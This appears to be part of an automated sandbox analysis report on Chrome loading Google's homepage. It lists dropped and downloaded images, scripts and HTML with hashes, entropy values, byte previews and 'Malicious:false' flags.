                                                                                                                                                                                                                                                                                          Preview:(function(){"use strict";function mobile(){return ios()||android()}function ios(){return/iPhone|iPad|iPod/i.test(navigator.userAgent)||ipad()}function android(){return/Android/i.test(navigator.userAgent)}function chrome(){return-1!==navigator.userAgent.indexOf("Chrome")&&!edge()}function safari(){return!chrome()&&-1!==navigator.userAgent.indexOf("Safari")&&!edge()}function ipad(){return-1!==navigator.userAgent.toLowerCase().indexOf("macintosh")&&Boolean(navigator.maxTouchPoints)&&navigator.maxTouchPoints>2}function edge(){return-1!==navigator.userAgent.indexOf("Edge")}function now(){return Date.now()}function timeDiffMs(t,e){return e-t}function debounce(t,e,i){let r;return function(...s){const a=this,n=()=>{r=void 0,t.apply(a,s)},o=()=>{r=void 0};i||void 0!==r||(r=+setTimeout(n,e)),i&&void 0===r&&(t.apply(a,s),r=+setTimeout(o,e))}}const getAllTrackedElements=(t=document)=>Array.from(t.querySelectorAll("*:not(a)[data-category][data-action][data-label]"));function findAnalyticsTargetElem
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 58 x 58, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):18405
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.30307468404555
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:oFZ/I09Da01l+gmkyTt6Hk8nT7skEWRwxNXuBQ5uPqcVAG0PuwfTl:oFS0tKg9E05T4kt+puGuwfTl
                                                                                                                                                                                                                                                                                          MD5:6E79FA388ECA6523260E1B19714CB06D
                                                                                                                                                                                                                                                                                          SHA1:67F1D1C01DC339EA0C07D2299B5BD5BC1D62F4FE
                                                                                                                                                                                                                                                                                          SHA-256:F9991B7C4894AF087C50FDEF3F3BDDB0856197877DDA93840D0967C6895BD4B5
                                                                                                                                                                                                                                                                                          SHA-512:C227F81EB418CEB66D94E14CA6B44E1210A62DFF2FE5741E48922864C526805C9DE60ED68C81E3278007D4AD95F3EA349EBA969050A5511C991AEC75AFDFF689
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...:...:......J(....pHYs...#...#.x.?v...OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 1498
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):660
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.64627093963119
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:XIETEYVCLU+GwG+Y11+ZVVx3NGbdaV6IaMBdpJk7vWHoxw20k39zNpsPgQoC:XIEFVCGw61kVxd36RKdpJQvW0Yw9EP9p
                                                                                                                                                                                                                                                                                          MD5:6D6A8266ADCF375CB763FF6F38CB3582
                                                                                                                                                                                                                                                                                          SHA1:10E44D4B3E1C8530997CD2C440FD2ADA704D965D
                                                                                                                                                                                                                                                                                          SHA-256:1F0D08A762AFAEE058EBFE5F667208986FA7F76A9B06BE8DF0CE59B6A382ABA7
                                                                                                                                                                                                                                                                                          SHA-512:16BCCEE4355899E66D8A4CD446640381531C8C5BF20E775A38C4921CBA91C594FBBC251C478A3DD0E6E49717BE6B249B147899DF1C872137D2B217320A954F34
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...........T.n.0.}.Wx./.....@..../..T..!p...#p....@..lX..)..3.....[....sUF.S..,S...2.~.......z.D.<.+...=F+./W.....}Q..3......#.).....\..n..;..jiZ.1..;......9 ...l.xv.`...A...U.Uu.~..NW...F.>...B.5.5H.m........\.r....o.2......ZC.q.fh....L..l^.D...C.:E..m.Z.<.08.Zm0.u..2.*eo..$1z...6{R....[Y.,..m.=.V2Up[.c...t......".n.(.p.}....@D0...z........H.R......|........J.kRk(......UQ$.Zf.."^.w..4.I..R...#....o_..b1q@.e.t..Q~...p..2........R.d.I`.`....S.|..<...m.x.a......rY...........^C"..:...C6...A..y...'lW..$.=R>....$f.1t...zt......o...0r..h.P.;....3..&..A....8....;.m....,..9.1.......=F.....B....;.....h.........G.....s:.........WL....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2290
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8904718577516855
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:wryYbkyGVdlNbZaOrs8fWuwkU1pbUm13sTEc7hEOFxRKsm/15:EyYb2FNYwsFH1pbDBsQaEyW
                                                                                                                                                                                                                                                                                          MD5:6CD91ABF26A1821C13028A09DDE8A734
                                                                                                                                                                                                                                                                                          SHA1:E793230176267FE9A91931107AABA9C93502CD9D
                                                                                                                                                                                                                                                                                          SHA-256:63A4D6D1727DCE2864794B52F86DCE4ECAC11F5AD49249C4FC0BDDCF67A11304
                                                                                                                                                                                                                                                                                          SHA-512:C4133E6A2AE3ECDC26121E9E991C736594057A7C71761964EC2D16617CE1AD23C4CB1021BA9AF4FBF09F6B636ED833179F8B164B714D50B7FBFAB1B7D795F3AE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8X..............ALPH......m.!I'UF.m.m.....m..]vU.}...qv....@?....M.b..e..Q..y.....?Q.}.....)../l..5+..v0WYz....Z.r.....a...kx&.............}e..Y..F...5xj.fA.\..D..g..~~..V.(....r^..\WP....Ea9#....R2.@..Z.H..:..:.`.."#.{\..eT....Q+...(.6.A.......S....%.q......WTI....c...Q...$..0..9.P.$P.In.XD.*. ..ax...!..F..... ...w..?=,....e)w.k^c.\.+..&......8.y.t.Sb].n\...x...*...WE......W.Y.7.......>F..W8....8.......u..]ly2.Y.w...g..M.@2uV.7)K.h.oE....d.s\...Y......]..l.......;..VP8 .....&...*....>m0.F.#"!*R....h..@.......?..........J;......Z..........`....H..~...{......)......P.....W...........^...8....S.%x.....hA.,.o.........q...X...wS....}..u.[...C.....q.).uy.Z...P8.............v...;....Z.[...Ce.....U...K?.c.p=.T#}.4......l....?.B...`.*...."..... ;.).a...\...66....>w.a.X...-.....J......FE.i.f.....by+5AT.>..r.t1.?...##..'.....WP.A.j]CR......+..=}.{.....f.B...EQ...+v.Fe..(...{......y..Wa.....v.....$...c...lA+....-.v..Bq.&.E...P
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):10051
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.969290114185508
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:7DgOY9e1FUAHDFm52CY3Dm5zQEGibOXj4Jx4jX5H8cdoX5:7Dg7OCAHRQ2CFoi+wx+qcOX5
                                                                                                                                                                                                                                                                                          MD5:C48F5B981826BB17E35E118421610C36
                                                                                                                                                                                                                                                                                          SHA1:7A7CE4A5962E64D847286937C30650093C93566F
                                                                                                                                                                                                                                                                                          SHA-256:291921EC65CB3762CCF73C61F039CF97BCABC3EA83A7B1EEFA7398A509DBF67F
                                                                                                                                                                                                                                                                                          SHA-512:FCA9826B85F7818036DE52CBC53EFA746B42F705E1BB03886942505E624E1937A97248A7A80ECDD023F1E03E9A42D516E9434E6929225B135D650FA3E73CEC57
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6...'.IDATx..}w..Gu...}..M].$w...0..0<.C.. 8.B.......$$..&..`.m .flcl..>;.f.-..l.U.o{..s.?..^].2.J.MB...g..wwvw~3g.9g.T.Gp......`vq....G.>.q....v......#.$..y.(F@.......mG.u..-@|.p.m.n...`#.9...X...`..Ch..a.yK.|...z .w...mXzI..........6... ......p...F.|&.~1......4K.}.!h.2..V>..|1.k.'z..zQ]....}A..S...Z.....B....Ft...<.M.'.7...@....`....X...m.....8...y..o.~...]. ...M....UX...n.w../...!..0P.`u.........6.w9.%@}...sK...E........v......M.UK..>}..>...X..9..>...d...}..-.FL".......p.@.[+.X.)....z.. ..-...`.^..U....6..k}w.|.)..D.`bUE.&".1aP.{.....tUyW.u[...z.|X.....K ?xz^..t......U.+1.f#..."bb.>...3P.p..R..5..A.0..9.....7,._y7/...d].y.m.*...@...=..&.*.i#...]..y{.._:...e............l....l.....K4.L..J..TE.8...?mw..Bcqn....),<...3@P.H......&W...N.D.. w.DD..<.$`s..m_.|..-ixm.|H.|..."....$.=...Hd.h..f[;}r'.$..,.......&...Z....."..&.@..C..)...j....K.z...`.R.Pe..8<....R..q.LR.....&.....:(.uM".$...J(.w...$w2..<u.f ....DR%.0.?..~
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1438)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2515
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.482288356837175
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:VVZGb0GbYwgysygX3KWpjR8qqketnWjGFD+hMI8h/oi8GUgAWD2KnyH3LDu:XNytgXaO3CI4I8hwiZ
                                                                                                                                                                                                                                                                                          MD5:621583B5CEC5368E4FECE080EDCA1B44
                                                                                                                                                                                                                                                                                          SHA1:08E208D1F5129532EACF4F1E473E14DDE50736DA
                                                                                                                                                                                                                                                                                          SHA-256:809F040C1B14F5927ECA6A307A627ADAF6F319B976AF342E542BB0D8CB74B2A9
                                                                                                                                                                                                                                                                                          SHA-512:296B95EAB0039FCE976C8319FAC2F90ED38B56AC3ADD24FC41DD011A30B5FC7F430F826CF5B46FAE8328E69E67A5AE90D87888C44ACE803C7EAAB71695D316E0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:(function(){var f=this;.function g(a){var b=typeof a;if("object"==b)if(a){if(a instanceof Array)return"array";if(a instanceof Object)return b;var c=Object.prototype.toString.call(a);if("[object Window]"==c)return"object";if("[object Array]"==c||"number"==typeof a.length&&"undefined"!=typeof a.splice&&"undefined"!=typeof a.propertyIsEnumerable&&!a.propertyIsEnumerable("splice"))return"array";if("[object Function]"==c||"undefined"!=typeof a.call&&"undefined"!=typeof a.propertyIsEnumerable&&!a.propertyIsEnumerable("call"))return"function"}else return"null";else if("function"==.b&&"undefined"==typeof a.call)return"object";return b}var h="closure_uid_"+(1E9*Math.random()>>>0),k=0;function l(a){var b=m,c=n;c=void 0===c?window:c;a=c.navigator.userAgent.match(a);return!a||a&&parseInt(a[1],10)>b}var p={i:"ie",f:"android",j:"ios"},q=/MSIE\s(\d+)\.(\d+);\sWindows\sNT/,r=/Windows\sNT.+Trident.+rv:(\d+)(?:.(\d+))?/,t={i:q,m:r,j:/(?:iPhone|iPad)?;.+OS\s(\d+)_\d+/,f:/Android\s(\d+)\.(\d+)/},u=/\bglue
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 52 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2583
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.898641511390697
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:QidnNIUVi6bOsyJAChX1jcF9QAXQYT0rx4R:rnqUVrbOyCEz0YSY
                                                                                                                                                                                                                                                                                          MD5:33AC77B409EC3AEDF40FB11C025AB7B6
                                                                                                                                                                                                                                                                                          SHA1:AECC10D7A81A9EE2574EF5D1A410236C2463E659
                                                                                                                                                                                                                                                                                          SHA-256:C55C9756F61B6EDD413945E504C6FEE33242F35904EB525EBFA872EA7F499FA1
                                                                                                                                                                                                                                                                                          SHA-512:C8D2596E596F4DB9C9152C70D367AB4D4C2F37FBCC9F1CAF707E025B54258D85D3E1F7A36EE5E3217B70EFCC1486BF0005DDEB8F2500049B67BBDF84BCC4FF08
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/0YCXGIVz8K10S8d0hDJIGNq3kqWYdoDu8vyOIkjWD3XOJYHW2MuV7dUEimPXmv-BJ97WEWZizNNkuXTDKAaTMx2uzQGNPtTpy8YoACisMb4W9fgr7E1A=-h48-e365-rwu
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...4...0.....^.Y.....sBIT....|.d.....IDATh..k.]U...k.s...ig:HKE. .G....Q.D .................O .cbb4.......+........a..L;m.u...p...wf.6.+.3...^............R....u6.....n`....}.....+f.iP..F*....qQ..1.......7..Y...qA.z..f.}..5.........s....$c..<...b..:]N..l[/..?m.q.E......;..*,.&.Wi.4..a.r..uS.........a....b.++)...V...|..Z.....Ip....._.8.HTW......K..+x......%>}q...8...F....PDU....|i.z..>@..S;5.b.Z.z.35V%..a.E. ........0.V....e..PE.Jc..D2...?.&...H......>3..S.@.J.%T.!2^....u.o..~,.$....y.h....V.2..\.}..2....y&qqLk..kS]..BP..3@.....GS..D.w...6.....W+J!.rG......K..D...-@.j...D..B1`5!R........D...v..........K...@D..?Zh..p....z.Z._.s..'w.....j^.".5........J.os...=x.....U8+..$B..V.B.3.G..!......(...l..[..4...GH v1....8_un.....sh.B..$.s.w._@. ....s.l..}.Q\.J..\.J..-...Hb...2t..S...(V.e..I..nl.f....D.0......."z?tI..^.g.10u.aGF0.....P....'..Ede'.Q...xk.....c{Pv>........+Ox..].\.....25...(l:..K+..O.......la.(.Q.7.f...E.7..x..H..<....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):10906
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.976159811086094
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:TOgtGkBrrBF40535s0+0IuklO7ifO00Mj5hjnR1aY1ozr0YI/rOgL99UHKh9TBO2:TOmHBt5JdGw7ify8hjPB1of5I/66fJhV
                                                                                                                                                                                                                                                                                          MD5:21C3437676BD897D92D912BC18FAB8E0
                                                                                                                                                                                                                                                                                          SHA1:E99E5CEF97011C5A4211A80AC9658740B9E887F4
                                                                                                                                                                                                                                                                                          SHA-256:92D6567B2D8FD8559F9280C426D4710E3F6E660689E7830D698ECF8DDDB8E2B9
                                                                                                                                                                                                                                                                                          SHA-512:CA578C3BAA1FA96F31A80732664E2E438D40200B0944788DC92F5FD27B3F3E4C2C55967E8D624F2E765A1576FAB076C6A3379B87AF8D9F7C437B033F1F2CF2B5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d... .IDATx..w.%G}.?....{..$Ih....PF..l.w..c0...@.6`.....:p..{If.66.H....6..,..DVB.e.4...y......?:...0..9..s...........jx.....9z..... y.....7..cyg.jl..[p].wT]..............@L..3w(...3...g7.......l.x....1..*....Z.cT......%E\......4...U;#...<.7f.kt..v....L...........tW.J.:..].....UG6.,'-.z......W.T..*..P..U....!.Gp.8....x4BU?P...X.;r...v..}p...=...|i...x.gv..1....9qN..axVAd..4B.a.@[..@...A.....T.c.@..!....P..9...Wom....}..<xxz.rt.....W^0f^^.qQ=..f`.ta...B%.V.n.U.!..r.2..8@..<....r.sO.p..w.....:*.....gvO.....:.j-.s..P#N.q.......(.w..u,@... .l/zr...M.k................]........*k..~/.b..}...xX...I.y"xF1F.V<..U.{<(].;6..m.........qy.K.B=...j...`X.x.~_........'.92Sv.Cu.|f..}.GuG..Q.W_...c...f(..7.....=.?.bz..{.;....({f..q...yo..-w....3..I....E...}-.....".xIu,...........|.K..Y.j.;.y.?.......}.P.[..]8.u+...{.+...Gl.W.t..=.;ld...^..gU.......}H..Q[.wT...T...p.:.....>r$.}D../?^....p.o{.XX.E;....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3665
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.908096599643296
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:OS6Vh6C7mb2FUt1ZDr/gTPNGIkNj9/lsKH3yXv7LyC7j9YRE:OS8S6FmZ/8aHtD3wTLyQj+RE
                                                                                                                                                                                                                                                                                          MD5:9C1533227615CCEB423094AC7DA39F8E
                                                                                                                                                                                                                                                                                          SHA1:978DB48B75CD3CDB75007D4A8726F01CD45E9848
                                                                                                                                                                                                                                                                                          SHA-256:5B52B75FB36BAFDA3D8C642D65CCCD5E38913DBF5CA10C70AA4B57FCF95A2764
                                                                                                                                                                                                                                                                                          SHA-512:933B48E44167626C2AA50195B85B1EAA20AC7618A88F18F6B05FCFBF1C6009632F6318AAB6B10AFD5FE67000D68C4114B9107F668F84B85ABB92A0A965F2756C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....pHYs.................IDATx..kp\e.....n.K.........5! ..d........Xo#8..A...../..w.FT..q.....Z...n.B.R..k...4....s..m.6{=.{vs.o........{.y..>.....Bp1[]..zY18...pV..8+...p._...g.Z.........Z@~jx...d.t7dT..27.5.:.f`...&.o..N.O.~.....}......R.[........*..l....t.......:.\15<.].*..,.v..I.7..<p....\U.P.......7...i.\.............o......t. .|...M.Z-%....Mk...%...S..s..Z..5.WX.....l.A1...D.w.b....@tB.............w"{.9..'....].)...i.].@...-A.o.j.. .|.j..+..V ....z.f..d.P...AC......x.x..<.\>5<.G....(....'&.~.....g.2..).......Q.v...!`.v..x...pq..2.Xl.E...SP..1.G.@fjxb.....;:6.p..h....:........n.....EU..5.Z .\.....n.,.~|<2d.Zk....S....H....;.[..v...+`kx..U...n...!.Z.../.KtFBw.......j.h.......F.......pud.zTW]e........F.j.c.A.L.....0..A3..l.mr[.....7..Fv.M..(~/.n.h.......7..Q.ILB.dr.z.....8!l...\..P.C....=....g...G.y.s..zR.v!."p.......-..Ks.8.ld..E..]..9..!...u"...=....Z.....np$d..K^".w..q...;..j..a.X-,y...a...Z...j..]
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (13475)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):199673
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.880721062244443
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:zDejEKbSdjX+FZUDI6Sv53rh8IQzAUtN+ek/jFFV:zDejEKedaFZ4I6I53r2IQUPV
                                                                                                                                                                                                                                                                                          MD5:C97F671451F32114AC6BDC1F83291BDE
                                                                                                                                                                                                                                                                                          SHA1:920669D93D0F8BF0A8CA6499B2C9EC24AD8BD774
                                                                                                                                                                                                                                                                                          SHA-256:92CBEAEDEDC07C518065966A2774143D8E43CDAEE68BB5F0E718CF61969225B8
                                                                                                                                                                                                                                                                                          SHA-512:003ED61B6BD951C75D9B98EFD11A14707551735AB1521CD599038EDF92901592B91C4A5481ED2CF9463A4C93A4AABF1259A99EAEBDC7C776BA185D696887B228
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/
                                                                                                                                                                                                                                                                                          Preview:<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><meta content="Anm+hhtuh7NJguqSnXHEAIqqMaV+GXCks8WYXHJKF7l6AeYMj+wO+fi9OdDqFnJTg9t0492DykVxx4jpvFbxnA8AAABseyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IlByaXZhY3lTYW5kYm94QWRzQVBJcyIsImV4cGlyeSI6MTY5NTE2Nzk5OSwiaXNTdWJkb21haW4iOnRydWV9" http-equiv="origin-trial"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="Oyt-oYHGJn0kLT6CJ0SrlA">window._hst=Date.now();performance&&performance.mark&&performance.mark("SearchHeadStart");</script><script nonce="Oyt-oYHGJn0kLT6CJ0SrlA">(function(){var _g={kEI:'CsT2Zo-iIaySxc8Pn72EmA8',kEXPI:'31',kBL:'M4TQ',kOPI:89978449};(function(){var a;((a=window.google)==null?0:a.stvsc)?google.kEI=_g.kEI:window.google=_g;}).call(this);})();(function(){google.sn='webhp';google.kHL='en';})();(function(){.var h=this||self;funct
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 240x240, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5040
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9559327252264
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:ZRG8iFZ7uyU8t6HtHOja0ImzV0I6I1rNUxS6c2kWbJf:Zs3U8UHtuW05sIRa/cLW
                                                                                                                                                                                                                                                                                          MD5:BB558876CB9C9A12D2C76A33729DF692
                                                                                                                                                                                                                                                                                          SHA1:B0C5E1A068D33A6E6FB4887D8BD8A0031B97E359
                                                                                                                                                                                                                                                                                          SHA-256:9212A2BE69C52B4B981A7176D08D0279388F03FCE1131F29EB562561CDB06717
                                                                                                                                                                                                                                                                                          SHA-512:38CD82EC71B020EDA1F9E4C9A8ECF0A9CE51179DCE847375BD488895C8A4577AAACCC0B09A7A0EF8BC1AB49C92B187904CEE12A358EC2F749AA5E49D1F46A1B2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8 .....\...*....>A .D..!.x},(......3u....?..S{m.?......k.sa...g.....}a.t.....*.k.....'s?0....^._..[.............S.c.O.[.S......io..`.F.z....>/.....]....'.m...........a.oX...k=..[.)...[...g....u..b...q.i..:...k..?b..}Q.&.....w.OsM..|.......C..........`...T6..|30.kU.-x.....Dk..../.!..QF..mM....,|;r..$^vm......:<.B..J...t..3..F...r.M..K..<{.I.pG.2K...J.....`.z....G[.t.....N.!....J.b.]9.(.w......$.,p.....vVEP7Y6.....DO.UP.9.9...........|...u..e.y.S|V....@............]..k`,.\.9Y%.....Y..D..........Nc~....G.,.o$......oNn</..q...,tZ..._}..z.._..3....a.C.}.h....F:.o...q.C......GP..k..J;R..._*S.W.t...N.G..V...u.?..]....c ...o.t/'....e..s..G...n..f.C.n../"...cANS.".A...B...<R*..Fo;..&..g.....o).E.?..y^...E.45...8@..N.Z|.Nq...l..S..k.e@...`.T....m3\..3..H....)!.I.Q..NV.#.lj.3.y.$.o..v......i8...EJ@....GEJY.P...Z....e...".P..z.aI....|.....E..e.Q..........._....])...4?.......)...-.....4.}......sT....P..#w.h.z.Q..1. C=..D.....4...Y....\....`....-gJ\..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):4437
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.923976804215128
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:hjvpGFrQ8YLH+gBJ1DYRtPIhwEhIcN4cp8329Rd8IoI6IlAlJ:hjvp2YCgBPDYRtwhciVp832CIVAlJ
                                                                                                                                                                                                                                                                                          MD5:E26885170F89158FEB6AF797E52A979F
                                                                                                                                                                                                                                                                                          SHA1:A2C5820CE8368C804BEE88F738E53598F5C26406
                                                                                                                                                                                                                                                                                          SHA-256:F170EAAF0080C70EAFA8D4DC444985C89AD349DD03A3E934702606212D35EFC0
                                                                                                                                                                                                                                                                                          SHA-512:D14ACF200E86D7CD61FBFF0156EAD10463EFF08C650FE11C2FB50F50740D7281FDFBE3EE67CD90F612181C2479E91BB2CA6E3EB0FB4927B42F18DB0296B1633A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/mXJcrB99dv3D2R3626qv23yNzcp64hKW1n7cx78DQmybiBB-radVYvRguIs-lfQz1oYh72Oq_5Tk51U6fAqzzJb95vww5cyi79Wk0g=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2....IDATx..{...}.?=3.{..I...q'.....SHF.........8.8Q..2).(.X.)bo.......p...:.O........&.e...../I'....<:....................|.7..._wC..5j.Q.F..5.C.m@.I..z`"`.......+.2sa..._I..i+.........&...O........x.x'.2.....|..N.......`.J.).Q.....lF..$......._...iK....%.g(.....g.{...)........'..$.Z.l`..EJ...~.'...2Cc\..L[S..@.H.\|.....M..}.;0..yq..,.rU......R.d...+.Q.U..8&.2e@......cd...K..u.....N.d.....^..._.+.o..+g....L.1......0...9x.?.q........aU>......e..Zr.@"...sa2m.....0.....3.]s...).....6.c......R.........x.....5...mD)D^`.".........n..zUO......q.gC..o..H...h.|.....H..fX......z..Q.....ikQ..Dd..=.0..B<..... Z.....zU.a.R..............(/..2....)F$..3....@.!A.N..E.U....I....R.....J./....,E..9"'..1.3&J)@...f..At%....L[..6d8........X.|...\...1.e..GK...U,./."%0.....?...af....FZ`P./../......\..z|....%..g.<
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 341, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):193609
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.997486741473688
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:3072:xyMl+ztzGdKsmFKKSpO2fmwXQ3bUdsfSsnSXFkIpX+jJonuA46tpMbBkVHh/skQq:xDlQ6dyF5UmwXaNfSsnS1CjJonXHkQhr
                                                                                                                                                                                                                                                                                          MD5:36EB24FB52166D0C85330E04220B1691
                                                                                                                                                                                                                                                                                          SHA1:C745F010F08546479803F8B68FE5F4CC7F46A2C2
                                                                                                                                                                                                                                                                                          SHA-256:3C10ADF9692F3105840F95B2528E8A674D69146192B38620422433A983EAD87C
                                                                                                                                                                                                                                                                                          SHA-512:9E09F41BD5630F28F7372AF6A6F77F1DE7236279B20D0245C7B666C60F242542AFBCB379846DE357ED4884273EDB936892F1547BD4D805C33200E8E41DFC705A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/RIuSgyC1CZvycdCvOhK6kyGWtKZwR6gN88CimyIAdew4WMYXisZeD2x5A3fOi3GETtFbnKgxw7hb_2_ERw1-ygGSCExAsemrYx79J0hRsa4SZzzxz3A?=w1440
